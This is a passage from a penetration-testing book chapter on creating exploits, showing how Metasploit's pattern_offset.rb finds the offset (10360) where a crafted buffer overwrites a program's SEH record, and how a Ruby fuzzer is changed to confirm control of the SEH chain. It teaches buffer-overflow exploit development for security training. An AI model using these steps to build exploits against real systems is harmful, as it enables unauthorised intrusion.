Creating Your Own Exploits
203
With the SEH overwritten with our random set of characters, we can use
pattern_offset.rb
in
/opt/metasploit3/msf3/tools/
to determine exactly where the
overwrite occurs by passing the characters of interest (
684E3368
) followed by
the length of the string that was sent to the target (
11000
), as shown here:
root@bt:~/.msf3/modules/auxiliary/fuzzers#
/opt/metasploit3/msf3/tools/pattern_offset.rb
684E3368 11000
10360
The value
10360
means that the four bytes that overwrite SEH are 10361,
10362, 10363, and 10364. We can now change the fuzzer code one last time
to verify our findings:
print_status("Generating fuzzed data...")
fuzzed = "\x41" *
10360
fuzzed << "\x42" *
4
fuzzed << "\x43" *
636
print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
As shown, the fuzzer will build the malicious request beginning with
10,360
A
s (hexadecimal
41
), followed by four
B
s (hexadecimal
42
) to over-
write the SEH, and then 636
C
s (hexadecimal
43
) as filler to keep the string
length constant at 11,000 bytes.
Running the fuzzer against the target again shows that the entire SEH
chain is under your complete control, as shown in Figure 14-4.
Figure 14-4: SEH fully controlled